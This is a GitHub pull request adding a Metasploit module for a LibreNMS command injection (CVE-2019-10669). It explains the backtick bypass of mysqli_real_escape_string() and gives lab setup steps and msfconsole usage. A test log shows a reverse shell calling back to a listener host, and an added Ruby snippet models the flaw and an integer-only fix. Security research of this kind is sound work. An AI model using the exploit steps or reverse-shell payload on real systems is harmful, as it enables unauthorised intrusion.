
Add module for LibreNMS CVE-2019-10669 #12189

Merged
merged 9 commits into from
Sep 6, 2019

Conversation

space-r7
Contributor

@space-r7 space-r7 commented Aug 13, 2019

A command injection vulnerability exists in LibreNMS versions prior to v1.50.1.

The injection vulnerability affects the Collectd graphing functionality. Specifically, the to and from parameters used in the range for graphing are sanitized with mysqli_real_escape_string(), which ignores certain characters, including backticks. These improperly sanitized parameters are then used in a shell command that gets executed via the passthru() function.

This module has been tested on LibreNMS v1.46 and v1.50.

Resolves #12100

Verification

  • Install the application
  • Start msfconsole
  • Do: use exploit/linux/http/librenms_collectd_cmd_inject
  • Do: set RHOSTS <ip>
  • Do: set USERNAME <user>
  • Do: set PASSWORD <pass>
  • Do: run
  • You should get a shell.

Vulnerable Setup

A vulnerable version of LibreNMS (v1.50) in the form of an OVA can be downloaded here.

Login credentials can be found on the official LibreNMS site.

Collectd will need to be set up with LibreNMS for this exploit to work. These instructions
are for the Ubuntu OVA.

sudo apt-get install collectd

Open the Collectd config file /etc/collectd/collectd.conf
and uncomment the global options for the Hostname and BaseDir.
Next, uncomment the lines for the cpu plugin.
The plugin should look similar to this:

<Plugin cpu>
  ReportByCpu true
  ReportByState true
  ValuesPercentage false
</Plugin>

Next, find the rrdtool plugin and ensure it looks like this:

<Plugin rrdtool>
   DataDir "/var/lib/collectd/rrd"
   CacheTimeout 120
   CacheFlush   900
</Plugin>

Save and exit

Now open /etc/collectd/collectd.conf.d/rrdtool.conf and add

LoadPlugin rrdtool
<Plugin rrdtool>
  DataDir "/var/lib/collectd/rrd"
  CacheTimeout 120
  CacheFlush   900
</Plugin>

Save and exit, then restart the Collectd service:

sudo systemctl restart collectd

Lastly, add these two lines to the LibreNMS config file,
/opt/librenms/config.php:

$config['collectd_dir'] = '/var/lib/collectd/rrd';
$config['collectd_sock'] = 'unix:///var/run/collectd.sock';

Now save and exit.

You can verify that Collectd is set up with LibreNMS by viewing the
localhost device in LibreNMS and noting that there should be a Collectd
tab on the device's main page. Additional configuration information can be found here.
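Added example, not code from this PR, the Metasploit module or LibreNMS: a small Ruby model of the sanitizer mismatch the description above points out. mysql_escape approximates what mysqli_real_escape_string() does to a value, and the integer-only check plus the rrdtool --start/--end argument shape are my assumptions about how a corrected version would constrain from and to before any command is built.

```ruby
# Approximation of mysqli_real_escape_string(): it backslash-escapes only the
# characters that matter inside a SQL string literal. Backticks, $(), ;, | and
# friends pass through untouched, so it is no defence for a shell command.
MYSQL_ESCAPED = { "\x00" => "\\0", "\n" => "\\n", "\r" => "\\r",
                  "\\" => "\\\\", "'" => "\\'", "\"" => "\\\"",
                  "\x1a" => "\\Z" }.freeze

def mysql_escape(value)
  value.gsub(/[\x00\n\r\\'"\x1a]/) { |c| MYSQL_ESCAPED[c] }
end

# Characters a POSIX shell interprets when a value is interpolated unquoted.
SHELL_META = /[`$;|&<>(){}\s\\'"]/

# True when the "sanitized" value still carries shell metacharacters,
# i.e. the escaping did nothing useful for its actual sink (passthru()).
def shell_metachars_survive?(escaped)
  escaped.match?(SHELL_META)
end

# Hardened check (assumed fix, not LibreNMS's own patch): a graph range bound
# is an epoch timestamp, so accept only a plain integer and reject the rest.
def valid_range_bound?(value)
  value.match?(/\A\d{1,10}\z/)
end

# Builds the rrdtool-style range arguments only after both bounds validated;
# with integers only, string interpolation into a command line is safe.
def safe_rrd_range(from, to)
  unless valid_range_bound?(from) && valid_range_bound?(to)
    raise ArgumentError, "range bound is not an integer timestamp"
  end
  "--start #{from} --end #{to}"
end

# Constructed sample input: a numeric prefix followed by a backtick pair.
SAMPLE_BAD = "1500`x`"
```

Running mysql_escape over SAMPLE_BAD returns it unchanged, while valid_range_bound? rejects it; that difference is the whole bug.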

@bcoles
Contributor

bcoles commented Aug 20, 2019

Did you have any luck with the auth bypass ?

@space-r7
Contributor Author

Did you have any luck with the auth bypass ?

I had luck with the actual graphing page not requiring auth, but the exploit needs a valid collectd plugin in order to work. Checking for collectd and a valid plugin required auth.

@jvoisin
Contributor

jvoisin commented Aug 30, 2019

You can also take a look at #9213 :P

@space-r7
Contributor Author

space-r7 commented Sep 3, 2019

You can also take a look at #9213 :P

Tried out that method and had no luck with it.

@bwatters-r7 bwatters-r7 self-assigned this Sep 6, 2019
@bwatters-r7
Contributor

bwatters-r7 commented Sep 6, 2019

msf5 exploit(linux/http/librenms_collectd_cmd_inject) > show options

Module options (exploit/linux/http/librenms_collectd_cmd_inject):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   D32fwefwef       yes       Password for LibreNMS
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.135.185  yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base LibreNMS path
   USERNAME   librenms         yes       User name for LibreNMS
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf5 exploit(linux/http/librenms_collectd_cmd_inject) > run

[*] Started reverse TCP double handler on 192.168.135.168:4444 
[*] Successfully logged into LibreNMS. Storing credentials...
[*] LibreNMS version: 1.50
[*] Sending payload via device 1
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xUnJ4MTYK9Us4Bu9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "xUnJ4MTYK9Us4Bu9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.135.168:4444 -> 192.168.135.185:59204) at 2019-09-06 11:31:31 -0500

whoami
www-data
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.135.185  netmask 255.255.255.0  broadcast 192.168.135.255
        inet6 fe80::a00:27ff:fe12:fd25  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3a:a00:27ff:fe12:fd25  prefixlen 64  scopeid 0x0<global>
        ether 08:00:27:12:fd:25  txqueuelen 1000  (Ethernet)
        RX packets 1043  bytes 340658 (340.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1052  bytes 949497 (949.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 676  bytes 102149 (102.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 676  bytes 102149 (102.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

bwatters-r7 added a commit that referenced this pull request Sep 6, 2019
Merge branch 'land-12189' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 70d5bd4 into rapid7:master Sep 6, 2019
msjenkins-r7 pushed a commit that referenced this pull request Sep 6, 2019
Merge branch 'land-12189' into upstream-master
@space-r7 space-r7 deleted the librenms-cmd-injection branch September 13, 2019 14:38
@pbarry-r7
Contributor

pbarry-r7 commented Sep 21, 2019

Release Notes

This adds a new module for exploiting an injection vulnerability in LibreNMS Collectd graphing functionality for versions of LibreNMS prior to v1.50.1.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 1, 2019
Successfully merging this pull request may close these issues.

LibreNMS Command Injection Vulnerability (CVE-2019-10669)